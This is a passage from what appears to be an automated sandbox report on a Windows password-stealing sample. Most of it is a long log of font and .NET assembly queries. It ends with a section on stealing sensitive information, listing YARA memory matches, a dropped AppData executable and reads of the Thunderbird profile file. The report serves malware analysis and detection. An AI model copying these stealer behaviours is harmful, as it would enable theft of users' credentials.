                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Users\user\AppData\Roaming\IwUNvHNy.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Users\user\AppData\Roaming\IwUNvHNy.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IwUNvHNy.exe PID: 5060, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
